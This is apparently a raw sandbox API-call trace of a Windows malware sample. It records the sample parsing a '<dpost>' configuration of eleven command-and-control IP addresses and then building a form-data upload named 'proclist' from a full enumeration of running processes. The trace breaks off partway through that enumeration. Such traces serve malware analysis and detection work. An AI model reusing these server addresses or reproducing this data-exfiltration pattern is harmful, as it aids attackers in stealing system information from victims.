	[0217.164] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://181.57.97.138:80</handler>\r\n<handler>http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=24 | out: lpString1="http://181.57.97.138:80") returned="http://181.57.97.138:80"
	[0217.164] GetProcessHeap () returned 0x270000
	[0217.164] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x290558
	[0217.164] lstrlenW (lpString="ttps://") returned 7
	[0217.164] lstrlenW (lpString="//") returned 2
	[0217.164] lstrlenW (lpString="") returned 0
	[0217.164] _wtoi (_String="80") returned 80
	[0217.164] lstrcpynW (in: lpString1=0x29055c, lpString2="181.57.97.138:80", iMaxLength=14 | out: lpString1="181.57.97.138") returned="181.57.97.138"
	[0217.164] lstrlenW (lpString="handler>") returned 8
	[0217.164] lstrlenW (lpString="/handler>") returned 9
	[0217.164] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://200.21.51.30:80</handler>\r\n<handler>http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=23 | out: lpString1="http://200.21.51.30:80") returned="http://200.21.51.30:80"
	[0217.164] GetProcessHeap () returned 0x270000
	[0217.164] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x290d70
	[0217.164] lstrlenW (lpString="ttps://") returned 7
	[0217.164] lstrlenW (lpString="//") returned 2
	[0217.164] lstrlenW (lpString="") returned 0
	[0217.164] _wtoi (_String="80") returned 80
	[0217.164] lstrcpynW (in: lpString1=0x290d74, lpString2="200.21.51.30:80", iMaxLength=13 | out: lpString1="200.21.51.30") returned="200.21.51.30"
	[0217.164] lstrlenW (lpString="handler>") returned 8
	[0217.164] lstrlenW (lpString="/handler>") returned 9
	[0217.164] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=25 | out: lpString1="http://191.103.252.29:80") returned="http://191.103.252.29:80"
	[0217.164] GetProcessHeap () returned 0x270000
	[0217.164] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x291588
	[0217.164] lstrlenW (lpString="ttps://") returned 7
	[0217.164] lstrlenW (lpString="//") returned 2
	[0217.164] lstrlenW (lpString="") returned 0
	[0217.164] _wtoi (_String="80") returned 80
	[0217.164] lstrcpynW (in: lpString1=0x29158c, lpString2="191.103.252.29:80", iMaxLength=15 | out: lpString1="191.103.252.29") returned="191.103.252.29"
	[0217.164] lstrlenW (lpString="handler>") returned 8
	[0217.164] lstrlenW (lpString="/handler>") returned 9
	[0217.164] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=24 | out: lpString1="http://200.35.47.199:80") returned="http://200.35.47.199:80"
	[0217.164] GetProcessHeap () returned 0x270000
	[0217.164] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x291da0
	[0217.165] lstrlenW (lpString="ttps://") returned 7
	[0217.165] lstrlenW (lpString="//") returned 2
	[0217.165] lstrlenW (lpString="") returned 0
	[0217.165] _wtoi (_String="80") returned 80
	[0217.165] lstrcpynW (in: lpString1=0x291da4, lpString2="200.35.47.199:80", iMaxLength=14 | out: lpString1="200.35.47.199") returned="200.35.47.199"
	[0217.165] lstrlenW (lpString="handler>") returned 8
	[0217.165] lstrlenW (lpString="/handler>") returned 9
	[0217.165] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=26 | out: lpString1="http://190.152.125.162:80") returned="http://190.152.125.162:80"
	[0217.165] GetProcessHeap () returned 0x270000
	[0217.165] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x2925b8
	[0217.165] lstrlenW (lpString="ttps://") returned 7
	[0217.165] lstrlenW (lpString="//") returned 2
	[0217.165] lstrlenW (lpString="") returned 0
	[0217.165] _wtoi (_String="80") returned 80
	[0217.165] lstrcpynW (in: lpString1=0x2925bc, lpString2="190.152.125.162:80", iMaxLength=16 | out: lpString1="190.152.125.162") returned="190.152.125.162"
	[0217.165] lstrlenW (lpString="handler>") returned 8
	[0217.165] lstrlenW (lpString="/handler>") returned 9
	[0217.165] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=24 | out: lpString1="http://194.5.250.44:443") returned="http://194.5.250.44:443"
	[0217.165] GetProcessHeap () returned 0x270000
	[0217.165] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x292dd0
	[0217.165] lstrlenW (lpString="ttps://") returned 7
	[0217.165] lstrlenW (lpString="//") returned 2
	[0217.165] lstrlenW (lpString="") returned 0
	[0217.165] _wtoi (_String="443") returned 443
	[0217.165] lstrcpynW (in: lpString1=0x292dd4, lpString2="194.5.250.44:443", iMaxLength=13 | out: lpString1="194.5.250.44") returned="194.5.250.44"
	[0217.165] lstrlenW (lpString="handler>") returned 8
	[0217.165] lstrlenW (lpString="/handler>") returned 9
	[0217.165] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=26 | out: lpString1="http://85.209.162.203:443") returned="http://85.209.162.203:443"
	[0217.165] GetProcessHeap () returned 0x270000
	[0217.165] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x2935e8
	[0217.165] lstrlenW (lpString="ttps://") returned 7
	[0217.165] lstrlenW (lpString="//") returned 2
	[0217.165] lstrlenW (lpString="") returned 0
	[0217.165] _wtoi (_String="443") returned 443
	[0217.165] lstrcpynW (in: lpString1=0x2935ec, lpString2="85.209.162.203:443", iMaxLength=15 | out: lpString1="85.209.162.203") returned="85.209.162.203"
	[0217.165] lstrlenW (lpString="handler>") returned 8
	[0217.165] lstrlenW (lpString="/handler>") returned 9
	[0217.165] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=25 | out: lpString1="http://194.5.250.130:443") returned="http://194.5.250.130:443"
	[0217.166] GetProcessHeap () returned 0x270000
	[0217.166] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x293e00
	[0217.166] lstrlenW (lpString="ttps://") returned 7
	[0217.166] lstrlenW (lpString="//") returned 2
	[0217.166] lstrlenW (lpString="") returned 0
	[0217.166] _wtoi (_String="443") returned 443
	[0217.166] lstrcpynW (in: lpString1=0x293e04, lpString2="194.5.250.130:443", iMaxLength=14 | out: lpString1="194.5.250.130") returned="194.5.250.130"
	[0217.166] lstrlenW (lpString="handler>") returned 8
	[0217.166] lstrlenW (lpString="/handler>") returned 9
	[0217.166] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=27 | out: lpString1="http://192.210.152.190:443") returned="http://192.210.152.190:443"
	[0217.166] GetProcessHeap () returned 0x270000
	[0217.166] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x294618
	[0217.166] lstrlenW (lpString="ttps://") returned 7
	[0217.166] lstrlenW (lpString="//") returned 2
	[0217.166] lstrlenW (lpString="") returned 0
	[0217.166] _wtoi (_String="443") returned 443
	[0217.166] lstrcpynW (in: lpString1=0x29461c, lpString2="192.210.152.190:443", iMaxLength=16 | out: lpString1="192.210.152.190") returned="192.210.152.190"
	[0217.166] lstrlenW (lpString="handler>") returned 8
	[0217.166] lstrlenW (lpString="/handler>") returned 9
	[0217.166] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=25 | out: lpString1="http://194.5.250.140:443") returned="http://194.5.250.140:443"
	[0217.166] GetProcessHeap () returned 0x270000
	[0217.166] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x294e30
	[0217.166] lstrlenW (lpString="ttps://") returned 7
	[0217.166] lstrlenW (lpString="//") returned 2
	[0217.166] lstrlenW (lpString="") returned 0
	[0217.166] _wtoi (_String="443") returned 443
	[0217.166] lstrcpynW (in: lpString1=0x294e34, lpString2="194.5.250.140:443", iMaxLength=14 | out: lpString1="194.5.250.140") returned="194.5.250.140"
	[0217.166] lstrlenW (lpString="handler>") returned 8
	[0217.166] lstrlenW (lpString="/handler>") returned 9
	[0217.166] lstrcpynW (in: lpString1=0x10f0f0, lpString2="http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=25 | out: lpString1="http://89.46.223.252:443") returned="http://89.46.223.252:443"
	[0217.166] GetProcessHeap () returned 0x270000
	[0217.166] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x810) returned 0x295648
	[0217.166] lstrlenW (lpString="ttps://") returned 7
	[0217.166] lstrlenW (lpString="//") returned 2
	[0217.166] lstrlenW (lpString="") returned 0
	[0217.166] _wtoi (_String="443") returned 443
	[0217.166] lstrcpynW (in: lpString1=0x29564c, lpString2="89.46.223.252:443", iMaxLength=14 | out: lpString1="89.46.223.252") returned="89.46.223.252"
	[0217.167] lstrlenW (lpString="handler>") returned 8
	[0217.167] GetProcessHeap () returned 0x270000
	[0217.167] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x28d700 | out: hHeap=0x270000) returned 1
	[0217.167] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1000300a, lpParameter=0x28d6f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8c
	[0217.167] ResetEvent (hEvent=0x8) returned 1
	[0217.167] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) 

Thread:
	id = 235
	os_tid = 0xa68

	[0217.168] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0217.401] _vsnwprintf_s (in: _Buffer=0x170efac, _BufferCount=0x400, _MaxCount=0x3ff, _Format="--%s\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\n", _ArgList=0x170f7bc | out: _Buffer="--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\n") returned 65
	[0217.401] lstrlenW (lpString="--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\n") returned 65
	[0217.401] GetProcessHeap () returned 0x270000
	[0217.401] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x82) returned 0x28db78
	[0217.401] _vsnwprintf_s (in: _Buffer=0x170ed74, _BufferCount=0x400, _MaxCount=0x3ff, _Format="\x09\x09***PROCESS LIST***\r\n\r\n", _ArgList=0x170f584 | out: _Buffer="\x09\x09***PROCESS LIST***\r\n\r\n") returned 24
	[0217.401] lstrlenW (lpString="\x09\x09***PROCESS LIST***\r\n\r\n") returned 24
	[0217.401] GetProcessHeap () returned 0x270000
	[0217.401] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x28db78, Size=0xb2) returned 0x28db78
	[0217.402] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9c
	[0217.404] Process32FirstW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0217.405] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="[System Process]\r\n") returned 18
	[0217.405] lstrlenW (lpString="[System Process]\r\n") returned 18
	[0217.405] GetProcessHeap () returned 0x270000
	[0217.405] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x28db78, Size=0xd6) returned 0x28db78
	[0217.405] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0217.406] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="System\r\n") returned 8
	[0217.406] lstrlenW (lpString="System\r\n") returned 8
	[0217.406] GetProcessHeap () returned 0x270000
	[0217.406] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x28db78, Size=0xe6) returned 0x28db78
	[0217.406] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0217.406] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="smss.exe\r\n") returned 10
	[0217.406] lstrlenW (lpString="smss.exe\r\n") returned 10
	[0217.406] GetProcessHeap () returned 0x270000
	[0217.406] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x28db78, Size=0xfa) returned 0x28db78
	[0217.406] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0217.407] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="csrss.exe\r\n") returned 11
	[0217.407] lstrlenW (lpString="csrss.exe\r\n") returned 11
	[0217.407] GetProcessHeap () returned 0x270000
	[0217.407] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x28db78, Size=0x110) returned 0x28db78
	[0217.407] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0217.408] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="wininit.exe\r\n") returned 13
	[0217.408] lstrlenW (lpString="wininit.exe\r\n") returned 13
	[0217.408] GetProcessHeap () returned 0x270000
	[0217.408] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x28db78, Size=0x12a) returned 0x28db78
	[0217.408] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0217.409] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="csrss.exe\r\n") returned 11
	[0217.409] lstrlenW (lpString="csrss.exe\r\n") returned 11
	[0217.409] GetProcessHeap () returned 0x270000
	[0217.409] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x28db78, Size=0x140) returned 0x28db78
	[0217.409] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0217.410] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="winlogon.exe\r\n") returned 14
	[0217.410] lstrlenW (lpString="winlogon.exe\r\n") returned 14
	[0217.410] GetProcessHeap () returned 0x270000
	[0217.410] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x28db78, Size=0x15c) returned 0x28db78
	[0217.410] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0217.411] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="services.exe\r\n") returned 14
	[0217.411] lstrlenW (lpString="services.exe\r\n") returned 14
	[0217.411] GetProcessHeap () returned 0x270000
	[0217.411] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x28db78, Size=0x178) returned 0x29a0b0
	[0217.411] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0217.411] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="lsass.exe\r\n") returned 11
	[0217.411] lstrlenW (lpString="lsass.exe\r\n") returned 11
	[0217.411] GetProcessHeap () returned 0x270000
	[0217.411] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x18e) returned 0x29a0b0
	[0217.412] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0217.412] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="lsm.exe\r\n") returned 9
	[0217.412] lstrlenW (lpString="lsm.exe\r\n") returned 9
	[0217.412] GetProcessHeap () returned 0x270000
	[0217.412] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x1a0) returned 0x29a0b0
	[0217.412] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.413] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="svchost.exe\r\n") returned 13
	[0217.413] lstrlenW (lpString="svchost.exe\r\n") returned 13
	[0217.413] GetProcessHeap () returned 0x270000
	[0217.413] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x1ba) returned 0x29a0b0
	[0217.413] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.414] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="svchost.exe\r\n") returned 13
	[0217.414] lstrlenW (lpString="svchost.exe\r\n") returned 13
	[0217.414] GetProcessHeap () returned 0x270000
	[0217.414] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x1d4) returned 0x29a0b0
	[0217.414] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.415] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="svchost.exe\r\n") returned 13
	[0217.415] lstrlenW (lpString="svchost.exe\r\n") returned 13
	[0217.415] GetProcessHeap () returned 0x270000
	[0217.415] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x1ee) returned 0x29a0b0
	[0217.415] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.415] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="svchost.exe\r\n") returned 13
	[0217.415] lstrlenW (lpString="svchost.exe\r\n") returned 13
	[0217.415] GetProcessHeap () returned 0x270000
	[0217.415] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x208) returned 0x29a0b0
	[0217.415] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.416] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="svchost.exe\r\n") returned 13
	[0217.416] lstrlenW (lpString="svchost.exe\r\n") returned 13
	[0217.416] GetProcessHeap () returned 0x270000
	[0217.416] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x222) returned 0x29a0b0
	[0217.416] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.417] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="svchost.exe\r\n") returned 13
	[0217.417] lstrlenW (lpString="svchost.exe\r\n") returned 13
	[0217.417] GetProcessHeap () returned 0x270000
	[0217.417] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x23c) returned 0x29a0b0
	[0217.417] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.417] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="svchost.exe\r\n") returned 13
	[0217.417] lstrlenW (lpString="svchost.exe\r\n") returned 13
	[0217.417] GetProcessHeap () returned 0x270000
	[0217.417] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x256) returned 0x29a0b0
	[0217.417] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0217.418] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="spoolsv.exe\r\n") returned 13
	[0217.418] lstrlenW (lpString="spoolsv.exe\r\n") returned 13
	[0217.418] GetProcessHeap () returned 0x270000
	[0217.418] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x270) returned 0x29a0b0
	[0217.418] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.419] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="svchost.exe\r\n") returned 13
	[0217.419] lstrlenW (lpString="svchost.exe\r\n") returned 13
	[0217.419] GetProcessHeap () returned 0x270000
	[0217.419] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x28a) returned 0x29a0b0
	[0217.419] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0217.420] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="taskhost.exe\r\n") returned 14
	[0217.420] lstrlenW (lpString="taskhost.exe\r\n") returned 14
	[0217.420] GetProcessHeap () returned 0x270000
